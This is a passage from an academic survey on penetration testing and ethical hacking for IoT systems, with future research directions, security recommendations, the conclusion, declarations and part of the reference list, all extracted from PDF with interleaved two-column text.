Legal Authorisation: laws must protect and support ethical hackers and recommendations to support the ethical hacking domain and to
during their simulated attacks, where pre and post-agreements are enhance penetration testing for IoT systems. Also, we propose the
needed to be established first, to legally maintain their safety and following ”Personnel and User Security Awareness Training (PaUSAT)”
security. (see Fig. 9) assigned to each working staff depending on their job nature

Forensics Knowledge: the need for more knowledge about forensics in a given enterprise or organisation, to establish and achieve both
and expertise is also required to conduct much more effective and compliance and accountability.
efficient penetration testing.

Maintaining Privacy: and respecting it, especially of both IoT users
9. Future research directions and companies during the conduction of ethical hacking and pene-
tration testing processes to ensure that it is protected during the
Securing IoT systems have undergone great progress in the last few whole process.
years, but there are still several challenges that lurk ahead, which may be
Multi-Factor Authentication must be adopted to prevent any
tackled in the next few years and decades. Security, safety, and privacy unauthorised access or abused legal access to IoT systems or devices
are still causing a serious challenge since a given attacker (i.e hacker) can that transmit, receive, or store sensitive data or information.
maliciously exploit these IoT end devices, which in turn, can lead to
Lightweight Security Mechanisms: such as lightweight encryption
complete or partial control of other IoT end devices, servers, or the whole and lightweight intrusion detection systems can be applied to
systems. Therefore, We present several potential research directions in resource-constrained IoT devices to ensure that they are also pro-
the following to improve PT for IoT systems: tected against any possible malicious event(s) such as security ex-
ploits or attacks, and to ensure a safer transmission of real-time IoT

Enable AI-based Solutions: especially since AI plays a key role to data based on a trade-off between IoT’s system performance, security
enable innovative penetration testing and ethical hacking solutions. and privacy mechanisms.
This is due to the ability to react to any discovered security vulner-
Enforced policies: the adoption of identification, authorisation, and
abilities in one of the following ways: authentication policies prevents unauthorised entities/users from
1. Detect: AI-based solutions can detect IoT-based security gaps and accessing IoT systems, which makes them less prone to insider threats
vulnerabilities with higher accuracy, with lesser time, and lesser and attacks.
false positives and false negatives.
Real-time isolation: the need to implement real-time proactive and
2. Prevent: AI-based solutions can ensure a much more effective protective security/safety mechanisms that instantly disconnect or
solution at mitigating threats and preventing IoT-based attacks at a forcibly shutdown any compromised IoT device(s) once a security
faster rate, more effectively, and more accurately. threat is detected. This will ensure that the compromised IoT de-
3. Correct: AI-based solutions can also offer a corrective process vice(s) will not be (remotely) controlled nor exploited by an
similar to the ”self-healing” concept especially for hybrid [349] adversary.
and distributed [350] IoT systems and applications [351] more
Safer IoT Designs: all IoT systems, applications, operating systems,
accurately and with lesser execution time, fault tolerance and error and end-devices must undergo a safety check test before and after
rates. achieving the required design to reduce the likelihood and the
4. Mixed: AI-based solutions are usually adopted when the process occurrence of any potential risk that may target any of the presented
requires either ”Detection and Prevention” or ”Detection and IoT parts.
Correction” tasks or both, depending on the incident’s occurrence
Fulfilling Skill-Gaps: is caused due to the lack of available skilled
or type (i.e. attack or accident). ethical hackers. Hence, more advertisements and recruitment cam-
paigns, seminars, and conferences are needed to encourage and
Sometimes, the detection process cannot be achieved especially in the educate more people to join the ethical hacking domain.
case of advanced passive attack types (i.e Footprinting, War driving, or
Specialised Training: especially security training must be assigned
Spying) [352,353]. Hence, an urgent and persistent need for more so- for each staff/employee category to overcome and address different
phisticated tools to detect attacks in their early phase to prevent them attack types that they might encounter in their fields.

301
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Fig. 9. Suggested User/Personnel Security Awareness Training for IoT User-related fields.

International Exchange & Competitions: are needed to enhance and penetration testing for IoT domains should also be highlighted.
the experience and skills that can be acquired via gaming challenges,
along with the establishment of new fundamentals for (potential)
New Jobs & Opportunities: ethical hacking and penetration testing
ethical hackers to follow. This also includes workshops, formations, jobs are the fastest growing jobs in IT (security) units of prominent
and educative online courses. organisations and industries. Such jobs are available in the private

Cyber threat intelligence: CTI is also important and should be sector, governments, military, and law enforcement including inves-
considered as a means to mitigate mainly external threats (and in- tigative agencies such as the National Security Agency (NSA) and the
ternal ones) since it focuses on their ongoing gained knowledge, Federal Bureau of Information (FBI).
experience, and skills based on previous attack occurrences [354].
Outside the Box Thinking: ethical hackers need to be creative
This is always done before assessing both cyber and physical threats problem-solvers to be able to detect and fix unknown system vul-
and identifying/defining their threat actors [355] to identify poten- nerabilities before their exploitation. This type of thinking is being
tial attacks to mitigate them and overcome harmful events before adopted now in an attempt to remain one step ahead of the attacker.
their occurrence and how to cyber defenders will react in case of an
Enhanced Critical Decision Making: is another aspect that security
attack [356]. firms are looking for, especially among the new generation of ethical
hackers, as they are expected to remain vigilant, on high alert, and in
In fact, the recommended security and safety measures regarding the some cases part of the rapid incident response team.
IoT can be summarised in the following Fig. 10.
New Skills: are always required depending on which organization
Nonetheless, future perspectives and scope regarding ethical hacking the ethical hacker and pen tester are working for. It is important to

Fig. 10. Recommended security and safety measures to secure and protect the IoT domain.

302
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

enhance their collaboration and communication skills, as well as their [7] Radana Dvorak, Heather Dillon, Nicole Ralston, Jeffrey Matthew Welch, Exploring
ethical hacking from multiple viewpoints, in: 2020 ASEE Virtual Annual
project planning, task handling, project planning, and management.
Conference Content Access, 2020.
[8] Urshila Ravindran, Raghu Vamsi Potukuchi, Yufei Peng, Hua Li, Xiaoyan Li,
11. Conclusion Jikang Wang, Xinyu Zhang, Amruta Khare, Ganesh M. Kakandikar, Omkar
K. Kulkarni, A review on web application vulnerability assessment and
penetration testing, J. homepage 9 (1) (2022) 1–22, journals/rces.
In this paper, the importance of conducting penetration testing for IoT [9] Sib tul Hassan, Analysis of vulnerabilities in system by penetration testing,
systems along with the reliance on trusted ethical hackers to perform Pakistan J. Sci. Res. 2 (1) (2022) 22–25.
[10] Jean-Paul A. Yaacoub, Hassan N. Noura, Ola Salman, Chehab Ali, Digital Forensics
simulated attacks are highlighted and discussed thoroughly. This enables vs. Anti-digital Forensics: Techniques, Limitations and Recommendations, 2021
the assessment of the security level against common IoT threats and at- arXiv preprint arXiv:2103.17028.
tacks and provides a better understanding of the evaluation, assessment, [11] Jean-Paul A. Yaacoub, Hassan N. Noura, Ola Salman, Chehab Ali, Advanced
Digital Forensics and Anti-digital Forensics for Iot Systems: Techniques,
and mitigation of any given risk against the IoT domain, including op- Limitations and Recommendations, Internet of Things, 2022, 100544.
tions to detect, patch, and update IoT systems. Moreover, we highlight [12] Michael Kassner, Ethical Hackers' Top Motivation Isn't Money, According to
the key differences between hacking and ethical hacking in IoT systems. Hackerone - Techrepublic, February 2018. https://www.techrepublic.com/arti
cle/ethical-hackers-top-motivation-isnt-money-according-to-hackerone/.
On the other hand, we describe how hackers operate according to their
(Accessed 11 January 2019).
objectives, goals, motives, gains, and benefits. We present various tax- [13] Jacob G. Oakley, Why human hackers?, in: Professional Red Teaming Springer,
onomies and frameworks as an overview regarding the hacking domain 2019, pp. 15–28.
in general that are in common with the IoT domain. Finally, many rec- [14] Aaron Yi Ding, Gianluca Limon De Jesus, Marijn Janssen, Ethical hacking for
boosting iot vulnerability management: a first look into bug bounty programs and
ommendations and suggestions are proposed to further train employees, responsible disclosure, in: Proceedings of the Eighth International Conference on
IT staff, and security personnel, in addition to insights about future work Telecommunications and Remote Sensing, ACM, 2019 pages 49–55.
to protect IoT systems by using smart automated ethical hacking and [15] Sara N. Matheu, Jose L. Hernandez-Ramos, Antonio F. Skarmeta,
Gianmarco Baldini, A survey of cybersecurity certification for the internet of
penetration testing solutions. things, ACM Comput. Surv. 53 (6) (2020) 1–36.
[16] Mohammed Ali Al-Garadi, Amr Mohamed, Abdulla Khalid Al-Ali, Xiaojiang Du,
Ihsan Ali, Mohsen Guizani, A survey of machine and deep learning methods for
Authorship clarified internet of things (iot) security, IEEE Commun. Surv. Tutor. 22 (3) (2020)
1646–1685.
Jean-Paul A. Yaacoub: Writing- Original draft preparation, [17] Vikas Hassija, Vinay Chamola, Vikas Saxena, Divyansh Jain, Pranav Goyal,
Biplab Sikdar, A survey on iot security: application areas, security threats, and
conceptualization, methodology. Hassan N. Noura: Validation, writing-
solution architectures, IEEE Access 7 (2019) 82721–82743.
Original draft preparation, conceptualization, methodology. Ola Sal- [18] Wan Haslina Hassan, et al., Current research on internet of things (iot) security: a
man: Validation, writing- Original draft preparation, conceptualization, survey, Comput. Network. 148 (2019) 283–294.
[19] Fadele Ayotunde Alaba, Mazliza Othman, Ibrahim Abaker Targio Hashem,
methodology. Ali Chehab: Validation, writing- Original draft prepara-
Faiz Alotaibi, Internet of things security: a survey, J. Netw. Comput. Appl. 88
tion, conceptualization, methodology. (2017) 10–28.
[20] Jean-Paul A. Yaacoub, Ola Salman, Hassan N. Noura, Nesrine Kaaniche,
Chehab Ali, Mohamad Malli, Cyber-physical systems security: limitations, issues
Funding and future trends, Microprocess. Microsyst. 77 (2020), 103201.
[21] Noura Hassan, Tarif Hatoum, Ola Salman, Jean-Paul Yaacoub, Chehab Ali,
This research was supported by funds from the EIPHI Graduate School Lorawan security survey: issues, threats and possible mitigation techniques, Int.
Things 12 (2020), 100303.
(contract "ANR-17-EURE-0002"). [22] Jean Paul A. Yaacoub, Javier Hernandez Fernandez, Hassan N. Noura, Chehab Ali,
Security of power line communication systems: issues, limitations and existing
solutions, Comp. Sci. Rev. 39 (2021), 100331.
Ethical approval
[23] Jean-Paul Yaacoub, Ola Salman, Security Analysis of Drones Systems: Attacks,
Limitations, and Recommendations, Internet of Things, 2020, 100218.
This article does not contain any studies with human participants or [24] Jean-Paul A. Yaacoub, Hassan N. Noura, Ola Salman, Chehab Ali, Robotics cyber
animals performed by any of the authors. security: vulnerabilities, attacks, countermeasures, and recommendations, Int. J.
Inf. Secur. (2021) 1–44.
[25] Danielle Griffith, Innovation at the edge: iot 2.0, in: 2022 IEEE Asian Solid-State
Circuits Conference (A-SSCC), IEEE, 2022, pp. 2–3.
Declaration of competing interest [26] Ian Zhou, Imran Makhdoom, Negin Shariati, Muhammad Ahmad Raza,
Rasool Keshavarz, Justin Lipman, Mehran Abolhasan, Abbas Jamalipour, Internet
of things 2.0: concepts, applications, and future directions, IEEE Access 9 (2021)
The authors declare that they have no known competing financial 70961–71012.
interests or personal relationships that could have appeared to influence [27] Emily Chow, Ethical Hacking & Penetration Testing, vol. 626, University of
the work reported in this paper. Waterloo, Waterloo, Canada, No. AC, 2011.
[28] Matt Bishop, About penetration testing, IEEE Secur. Priv. (6) (2007) 84–87.
[29] Patrick Engebretson, The Basics of Hacking and Penetration Testing: Ethical
References Hacking and Penetration Testing Made Easy, Elsevier, 2013.
[30] Rafay Baloch, Ethical Hacking and Penetration Testing Guide, Auerbach
Publications, 2017.
[1] Prabhat Thakur. Mathematical Modelling of Spectrum Sharing in Cognitive Radio
[31] Bharat S. Rawal, Gunasekaran Manogaran, Alexender Peter, The basics of hacking
Communication Systems.
and penetration testing, in: Cybersecurity and Identity Access Management,
[2] Kaneez Fizza, Abhik Banerjee, Karan Mitra, Prem Prakash Jayaraman,
Springer, 2023, pp. 21–46.
Rajiv Ranjan, Pankesh Patel, Dimitrios Georgakopoulos, Qoe in iot: a vision,
[32] Shicheng Zhu, Shunkun Yang, Xiaodong Gou, Yang Xu, Tao Zhang, Yueliang Wan,
survey and future directions, Discover Internet of Things 1 (1) (2021) 1–14.
Survey of testing methods and testbed development concerning internet of things,
[3] Rabie Ramadan, Internet of things (iot) security vulnerabilities: a review, PLOMS
Wireless Pers. Commun. 123 (1) (2022) 165–194.
AI 2 (1) (2022).
[33] Stephen Russell, Tarek Abdelzaher, The internet of battlefield things: the next
[4] Binbin Zhao, Shouling Ji, Jiacheng Xu, Tian Yuan, Qiuyang Wei, Qinying Wang,
generation of command, control, communications and intelligence (c3i) decision-
Chenyang Lyu, Xuhong Zhang, Changting Lin, Jingzheng Wu, et al., A large-scale
making, in: MILCOM 2018-2018 IEEE Military Communications Conference
empirical analysis of the vulnerabilities introduced by third-party components in
(MILCOM), IEEE, 2018, pp. 737–742.
iot firmware, in: Proceedings of the 31st ACM SIGSOFT International Symposium
[34] Vishal Gotarane, Sandeep Raskar, Iot practices in military applications, in: 2019
on Software Testing and Analysis, 2022, pp. 442–454.
3rd International Conference on Trends in Electronics and Informatics (ICOEI),
[5] Jean-Paul A. Yaacoub, Mohamad Noura, Hassan N. Noura, Ola Salman,
IEEE, 2019, pp. 891–894.
Yaacoub Elias, Rapha€ el Couturier, Chehab Ali, Securing internet of medical things
[35] Chinonso Okereke, Nur Haliza Abdul Wahab, Mohd Murtadha Mohamad, et al.
systems: limitations, issues and recommendations, Future Generat. Comput. Syst.
Autonomous Underwater Vehicle in Internet of Underwater Things: A Survey.
105 (2020) 581–606.
[36] Yutian Zhang, Jun Ni, Hanqing Tian, Wei Wu, Jibin Hu, Integrated robust
[6] Shriya S. Shetty, Rithika R. Shetty, Tanisha G. Shetty, Divya Jennifer D'Souza,
dynamics control of all-wheel-independently-actuated unmanned ground vehicle
Survey of hacking techniques and it's prevention, in: 2017 IEEE International
in diagonal steering, Mech. Syst. Signal Process. 164 (2022), 108263.
Conference on Power, Control, Signals and Instrumentation Engineering (ICPCSI),
IEEE, 2017, pp. 1940–1945.

303
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

[37] Bisma Bashir, Aqeel Khalique, A review on security versus ethics, Int. J. Comput. [69] Francesca Meneghello, Matteo Calore, Daniel Zucchetto, Michele Polese,
Appl. 151 (11) (2016) 13–17. Andrea Zanella, Iot: internet of threats? a survey of practical security
[38] Somosri Hore, Kumarshankar Raychaudhuri, Cyber espionage—an ethical vulnerabilities in real iot devices, IEEE Internet Things J. 6 (5) (2019) 8182–8201.
analysis, in: Innovations in Computational Intelligence and Computer Vision, [70] Tim Jordan, Paul Taylor, A sociology of hackers, Socio. Rev. 46 (4) (1998)
Springer, 2021, pp. 34–40. 757–780.
[39] AF Almeida Virgilio, Danilo Doneda, Jacqueline de Souza Abreu, Cyberwarfare [71] Jens David Ohlin, Did Russian cyber interference in the 2016 election violate
and digital governance, IEEE Int. Comput. 21 (2) (2017) 68–71. international law, Tex. Law Rev. 95 (2016) 1579.
[40] Raji Youssef Al-Bayati, Cyber terrorism (models of international efforts to reduce [72] Steve Mansfield-Devine, Hacktivism: Assessing the Damage, vol. 2011, Network
it), Tikrit J. Polit. Sci. 2 (28) (2022) 91–121. Security, 2011, pp. 5–13, 8.
[41] Victoria Jangada Correia, An explorative study into the importance of defining [73] Tracey Caldwell, Hacktivism Goes Hardcore, vol. 2015, Network Security, 2015,
and classifying cyber terrorism in the United Kingdom, SN Comput. Sci. 3 (1) pp. 12–17, 5.
(2022) 1–31. [74] E Denning Dorothy, Activism, hacktivism, and cyberterrorism: the internet as a
[42] Denham Byron, Ransomware and Malware Sandboxing, 2022. tool for influencing foreign policy, Netw. netwars: The future of terror, crime, and
[43] C
esar Brito, Luis Pinto, Victor Marinho, Sara Paiva, Pedro Pinto, A review on militancy 239 (2001) 288.
recent advances in implanted medical devices security, in: 2021 16th Iberian [75] Gabriel Jozsef Berecz, Istv
an Gergely Czibula, Hunting traits for cryptojackers,
Conference on Information Systems and Technologies (CISTI), IEEE, 2021, ICETE (2) (2019) 386–393.
pp. 1–6. [76] John Glynn, Online gaming: a virtual experiment in the dark side of human
[44] Ying He, Ruben Suxo Camacho, Soygazi Hasan, Cunjin Luo, Attacking and defence nature, Skeptic 24 (1) (2019) 14–18.
pathways for intelligent medical diagnosis system (imds), Int. J. Med. Inf. 148 [77] Bruce Schneier, Invited talk: the coming ai hackers, in: International Symposium
(2021), 104415. on Cyber Security Cryptography and Machine Learning, Springer, 2021,
[45] Dennis Broeders, Els de Busser, Fabio Cristiano, Tatiana Tropina, Revisiting past pp. 336–360.
cyber operations in light of new cyber norms and interpretations of international [78] Lech Janczewski, Andrew Colarik, Cyber Warfare and Cyber Terrorism, IGI
law: inching towards lines in the sand? J. Cyber Pol. (2022) 1–39. Global, 2007.
[46] Oxford Analytica. Unequal Israeli-Iranian Cyberwar Will Escalate. Emerald Expert [79] Randy Borum, John Felker, Sean Kern, Kristen Dennesen, Tonya Feyes, Strategic
Briefings, (oxan-es). cyber intelligence, Inf. & Comput. Secur. 23 (3) (2015) 317–332.
[47] Eduardo Izycki, Eduardo Wallier Vianna, Critical infrastructure: a battlefield for [80] Sanjay Goel, Cyberwarfare: connecting the dots in cyber intelligence, Commun.
cyber warfare?, in: ICCWS 2021 16th International Conference on Cyber Warfare ACM 54 (8) (2011) 132–140.
and Security Academic Conferences Limited, 2021, p. 454. [81] Libicki Martin, The coming of cyber espionage norms, in: 2017 9th International
[48] Mohee Ahmad, Cyber War: the Hidden Side of the Russian-Ukrainian Crisis, 2022. Conference on Cyber Conflict (CyCon), IEEE, 2017, pp. 1–17.
[49] George M. Moore, How International Law Applies to Attacks on Nuclear and [82] Nadav Morag, Cybercrime, Cyberespionage, and Cybersabotage: Understanding
Associated Facilities in ukraine, 2022. Emerging Threats, Colorado Technical University, October, 2014 media/CTU/
[50] Don C. Smith, Playing with Fire: Military Attacks against a Civilian Nuclear Power Files/ThoughtLeadership/cybercrime-white-paper. ashx.
Station, 2022. [83] Mihoko Matsubara, Countering cyber-espionage and sabotage: the next steps for
[51] Sourav Banerjee, Chinmay Chakraborty, Sumit Chatterjee, A survey on iot based Japanese–uk cyber-security co-operation, Rusi 159 (1) (2014) 86–93.
traffic control and prediction mechanism, in: Internet of Things and Big Data [84] Ellen Nakashima, Report on ‘operation Shady Rat’identifies Widespread Cyber-
Analytics for Smart Generation, Springer, 2019, pp. 53–75. Spying, vol. 3, 2011. Washington Post.
[52] Fenghua Zhu, Yisheng Lv, Yuanyuan Chen, Xiao Wang, Gang Xiong, Fei- [85] Timothy Sablik, et al., Cyberattacks and the digital dilemma, Econ. Focus (3Q)
Yue Wang, Parallel transportation systems: toward iot-enabled smart urban traffic (2017) 8–11.
control and management, IEEE Trans. Intell. Transport. Syst. 21 (10) (2019) [86] Sultana Sharmeen Karim, Cyber-crime Scenario in Banking Sector of bangladesh:
4063–4071. an Overview, –44, 2016, pp. 12–19.
[53] Sara Oleiro Araújo, Ricardo Silva Peres, Jos
e Barata, Fernando Lidon, Jos
e [87] Emma Chanlett-Avery, John W. Rollins, Liana W. Rosen, Catherine A. Theohary,
Cochicho Ramalho, Characterising the agriculture 4.0 landscape—emerging North Korean cyber capabilities, Brief. Congr. Res. Ser. (2017).
trends, challenges and opportunities, Agronomy 11 (4) (2021) 667. [88] Kargl Frank, Joern Maier, Michael Weber, Protecting web servers from distributed
[54] Bam Bahadur Sinha, R. Dhanalakshmi, Recent advancements and challenges of denial of service attacks, in: Proceedings of the 10th International Conference on
internet of things in smart agriculture: a survey, Future Generat. Comput. Syst. World Wide Web, ACM, 2001, pp. 514–524.
126 (2022) 169–184. [89] Stas Filshtinskiy, Cybercrime, cyberweapons, cyber wars: is there too much of it in
[55] PRZETACZNIK Jakub, Russia's War on ukraine: Timeline of Cyber-Attacks, 2022. the air? Commun. ACM 56 (6) (2013) 28–30.
[56] R
eka Szab
o, Cyber Warfare in the Ukrainian Conflict—A Determinant of the [90] Steve M. Furnell, Matthew J. Warren, Computer hacking and cyber terrorism: the
Outcome of the War?, 2022. real threats in the new millennium? Comput. Secur. 18 (1) (1999) 28–34.
[57] Sanjeet Kumar and Sahila Chaudhry. Risk of Hacking in E-Banking: A Study of [91] Andrew M. Colarik, Cyber Terrorism: Political and Economic Implications, Igi
Private Sector Banks. Global, 2006.
[58] Pierre Thalamy, Piranda Benoit, Julien Bourgeois, Engineering efficient and [92] James Andrew Lewis, Assessing the Risks of Cyber Terrorism, Cyber War and
massively parallel 3d self-reconfiguration using sandboxing, scaffolding and Other Cyber Threats, Center for Strategic & International Studies, Washington,
coating, Robot. Autonom. Syst. 146 (2021), 103875. DC, 2002.
[59] Melanie Schranz, Martina Umlauft, Micha Sende, Wilfried Elmenreich, Swarm [93] Jian Hua, Sanjay Bapna, The economic impact of cyber terrorism, J. Strat. Inf.
robotic behaviors and current applications, Front. Robot. AI 7 (2020) 36. Syst. 22 (2) (2013) 175–186.
[60] Rune Langleite, Carsten Griwodz, Frank T. Johnsen, Military Applications of [94] Mohammed Alhamed, Omar M. Alsuhaibany, Website Defacement Incident
Internet of Things: Operational Concerns Explored in Context of a Prototype Handling System, Method, and Computer Program Storage Device, US Patent
Wearable, 2021. 8,549,637, October 1 2013.
[61] Lin Zhu, Suryadipta Majumdar, Chinwe Ekenna, An invisible warfare with the [95] Robert W. Taylor, Eric J. Fritsch, John Liederbach, Digital Crime and Digital
internet of battlefield things: a literature review, Hum. behav. emerg. technol. 3 Terrorism, Prentice Hall Press, 2014.
(2) (2021) 255–260. [96] Maurice Dawson, Marwan Omar, Jonathan Abramson, Understanding the
[62] Martti Lehto, Cyber-attacks against critical infrastructure, in: Cyber Security, methods behind cyber terrorism, in: Encyclopedia of Information Science and
Springer, 2022, pp. 3–42. Technology, third ed., IGI Global, 2015, pp. 1539–1549.
[63] Vasile Coman, et al., The use of cyber attacks during traditional armed conflicts. [97] J.P.I.A.G. Charvat, Cyber terrorism: a new dimension in battlespace, The virt.
specific and the commitment of state responsibility, J. Law and Publ. Administr. 8 battlefield: Perspect. cyber warfare 3 (2009) 77–87.
(15) (2022) 35–44. [98] Paulo Shakarian, Shakarian Jana, Andrew Ruef, Introduction to Cyber-Warfare: A
[64] Emily Caroscio, Jack Paul, John Murray, Suman Bhunia, Analyzing the Multidisciplinary Approach, Newnes, 2013.
ransomware attack on dc metropolitan police department by babuk, in: 2022 IEEE [99] Andy Scollick, The Irish defence forces in the drone age, in: E.U. The (Ed.), Irish
International Systems Conference (SysCon), IEEE, 2022, pp. 1–8. Defence Forces and Contemporary Security, Springer, 2023, pp. 295–314.
[65] Andrew Feutrill, Dinesha Ranathunga, Yuval Yarom, Matthew Roughan, The [100] Fabio Cristiano, Deterritorializing cyber security and warfare in Palestine: hackers,
effect of common vulnerability scoring system metrics on vulnerability exploit sovereignty, and the national cyberspace as normative, CyberOrient 13 (1) (2019)
delay, in: 2018 Sixth International Symposium on Computing and Networking 28–42.
(CANDAR), IEEE, 2018, pp. 1–10. [101] Anthony J. Mattazaro, The Future Fight: Cyberwar at the Operational Level of
[66] Mikhail Buinevich, Konstantin Izrailov, Andrei Vladyko, Testing of utilities for War, ARMY COMMAND AND GENERAL STAFF COLLEGE FORT LEAVENWORTH
finding vulnerabilities in the machine code of telecommunication devices, in: KS, 2020. Technical report.
2017 19th International Conference on Advanced Communication Technology [102] Daniel Cohen, Danielle Levin, Cyber infiltration during operation protective edge,
(ICACT), IEEE, 2017, pp. 408–414. Forbes vol. 12 (August, 12, 2014).

[67] Petar Cisar, 
Sanja Maravi
c Cisar, General vulnerability aspects of internet of [103] Ilias Kapsis, 7 crypto-assets and criminality, Organised Crime, Financial Crime,
things, in: 2015 16th IEEE International Symposium on Computational and Criminal Justice: Theoretical Concepts and Challenges (2023) 122.
Intelligence and Informatics (CINTI), IEEE, 2015, pp. 117–121. [104] Fabio Cristiano, Palestinian Territory Occupied1, Routledge Companion to Global
€
[68] Butun Ismail, Patrik Osterberg, Houbing Song, Security of the internet of things: Cyber-Security Strategy, 2020, p. 35.
vulnerabilities, attacks, and countermeasures, IEEE Commun. Surv. Tutor. 22 (1) [105] Kyung-shick Choi, Claire Seungeun Lee, Robert Cadigan, Spreading propaganda in
(2019) 616–644. cyberspace: comparing cyber-resource usage of al qaeda and isis, Int. J.
Cybersecur. Int. Cyber. 1 (1) (2018) 21–39.

304
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

[106] Sabrine Saad, Muriel Chamoun, St
ephane B. Bazan, Infowar on the web: when the [140] Prakash Umasankar Mukkara, Ajith Kumar, Subbaraju Uppalapati,
caliphate goes online, in: Proceedings of the ACM Web Science Conference, 2015, Vishnu Vardhan, Sureshkumar Thangavel, Secure Network Communications, US
pp. 1–3. Patent 8,468,347, June 18 2013.
[107] Malcolm Nance, Christopher Sampson, Hacking ISIS: How to Destroy the Cyber [141] Salvatore J. Stolfo, Malek Ben Salem, Shlomo Hershkop, Methods, Systems, and
Jihad, Simon and Schuster, 2017. Media for Masquerade Attack Detection by Monitoring Computer User Behavior,
[108] Christina Schori Liang, Unveiling the” united cyber caliphate” and the birth of the US Patent 8,769,684, July 1 2014.
e-terrorist, Georgetown J. Int. Aff. (2017) 11–20. [142] Crispin Cowan, F. Wagle, Calton Pu, Steve Beattie, Jonathan Walpole, Buffer
[109] David H. McElreath, Daniel Adrian Doss, Leisa McElreath, Ashley Lindsley, overflows: attacks and defenses for the vulnerability of the decade, in: Proceedings
Glenna Lusk, Joseph Skinner, Ashley Wellman, The communicating and marketing DARPA Information Survivability Conference and Exposition. DISCEX’00, vol. 2,
of radicalism: a case study of isis and cyber recruitment, Int. J. Cyber Warf. Terror. IEEE, 2000, pp. 119–129.
(IJCWT) 8 (3) (2018) 26–45. [143] Krerk Piromsopa, Richard J. Enbody, Survey of protections from buffer-overflow
[110] Sonali Patil, Ankur Jangra, Mandar Bhale, Akshay Raina, Pratik Kulkarni, Ethical attacks, Eng. J. 15 (2) (2011) 31–52.
hacking: the need for cyber security, in: 2017 IEEE International Conference on [144] Jeremiah Grossman, Whitehat Website Security Statistics Report, 2007. Retrieved
Power, Control, Signals and Instrumentation Engineering (ICPCSI), IEEE, 2017, March, 8:2010.
pp. 1602–1606. [145] Donald Ray, Jay Ligatti, Defining code-injection attacks, ACM Sigplan Not. 47
[111] Caroline G. Jones, Computer hackers on the cul-de-sac myspace suicide indictment (2012) 179–190. ACM.
under the computer fraud and abuse act sets dangerous precedent, Widener L. Rev. [146] Xing Jin, Xuchao Hu, Kailiang Ying, Wenliang Du, Heng Yin, Gautam Nagesh Peri,
17 (2011) 261. Code injection attacks on html5-based mobile apps: characterization, detection
[112] John McBrayer, Exploiting the Digital Frontier: Hacker Typology and Motivation, and mitigation, in: Proceedings of the 2014 ACM SIGSAC Conference on Computer
The University of Alabama, 2014. and Communications Security, ACM, 2014, pp. 66–77.
[113] Sandor Vegh, Classifying forms of online activism: the case of cyberprotests [147] Puspendra Kumar, R.K. Pateriya, A survey on sql injection attacks, detection and
against the world bank, in: Cyberactivism, Routledge, 2013, pp. 81–106. prevention techniques, in: Computing Communication & Networking
[114] Peter Hays Gries, Tears of rage: Chinese nationalist reactions to the belgrade Technologies (ICCCNT), 2012 Third International Conference on, IEEE, 2012,
embassy bombing, China J. (46) (2001) 25–43. pp. 1–5.
[115] John Sweeney, Jens Holsoe, Ed Vulliamy, Nato bombed Chinese deliberately, [148] Bharti Nagpal, Nanhay Singh, Naresh Chauhan, Angel Panesar, Tool based
Guardian 17 (10) (1999). implementation of sql injection for penetration testing, in: Computing,
[116] Rohan Gunaratna, Inside Al Qaeda: Global Network of Terror, Columbia Communication & Automation (ICCCA), 2015 International Conference on, IEEE,
University Press, 2002. 2015, pp. 746–749.
[117] James P. Farwell, The media strategy of isis, Survival 56 (6) (2014) 49–55. [149] Diallo Abdoulaye Kindy, Al-Sakib Khan Pathan, A survey on sql injection:
[118] Judith Tinnes, Bibliography: islamic state (is, isis, isil, daesh)[part 4], Perspectives vulnerabilities, attacks, and prevention techniques, in: Consumer Electronics
on Terrorism 12 (2) (2018). (ISCE), 2011 IEEE 15th International Symposium on, IEEE, 2011, pp. 468–471.
[119] Shehabat Ahmad, Teodor Mitew, Yahia Alzoubi, Encrypted jihad: investigating the [150] Yunkai Bai, Andrew Stern, Jungmin Park, Mark Tehranipoor, Domenic Forte,
role of telegram app in lone wolf attacks in the west, J. Strat. Secur. 10 (3) (2017) Rascv2: enabling remote access to side-channels for mission critical and iot
3. systems, ACM Trans. Des. Autom. Electron. Syst. 27 (6) (2022) 1–25.
[120] Abdel Bari Atwan, Islamic State: the Digital Caliphate, Univ of California Press, [151] Ahmed Abdullah and Maryam Malik. A Survey on Sql Injection Attacks: Detection
2015. and Prevention.
[121] Darren Linvill, Matthew Chambers, Jennifer Duck, Steven Sheffield, Mapping the [152] Jonathan Held, Cross-site scripting (xss), in: Encyclopedia of Information
Messenger: Exploring the Disinformation of Qanon, First Monday, 2021. Assurance-4 Volume Set (Print), Auerbach Publications, 2010, pp. 638–645.
[122] Martin A. Miller, The dynamics of entangled political violence: from the [153] Ammar Atef Al Azab, Malware Detection and Prevention, Deakin University, 2013.
greensboro massacre (1979) to the war on terror (2001), in: Terrorism and Technical report.
Transatlantic Relations, Springer, 2022, pp. 33–42. [154] Christian Seifert, Jack Stokes, Long Lu, David Heckerman, Christina Colcernian,
[123] Nigel Copsey, Samuel Merrill, Violence and restraint within antifa, Perspect. Sasi Parthasarathy, Navaneethan Santhanam, Scareware Detection, US Patent
terror. 14 (6) (2020) 122–138. 9,130,988, September 8 2015.
[124] Jessie Daniels, Cyber Racism: White Supremacy Online and the New Attack on [155] Amir Afianian, Salman Niksefat, Babak Sadeghiyan, David Baptiste, Malware
Civil Rights, Rowman & Littlefield Publishers, 2009. dynamic analysis evasion techniques: a survey, ACM Comput. Surv. 52 (6) (2019)
[125] Andrew Jakubowicz, et al., Alt_right white lite: trolling, hate speech and cyber 1–28.
racism on social media, Cosmopolitan Civ. Soc.: An Interdiscip. J. 9 (3) (2017) 41. [156] Ori Or-Meir, Nir Nissim, Yuval Elovici, Lior Rokach, Dynamic malware analysis in
[126] Jessie Daniels, Cloaked websites: propaganda, cyber-racism and epistemology in the modern era—a state of the art survey, ACM Comput. Surv. 52 (5) (2019) 1–48.
the digital era, New Media Soc. 11 (5) (2009) 659–683. [157] Qing Hu, Qing Hu, Tamara Dinev, Is spyware an internet nuisance or public
[127] Brian Cashell, William D. Jackson, Mark Jickling, Baird Webel, The Economic menace? Commun. ACM 48 (8) (2005) 61–66.
Impact of Cyber-Attacks, Congressional Research Service Documents, CRS [158] Swarup Bhunia, M. Tehranipoor, The Hardware Trojan War, Springer, Cham,
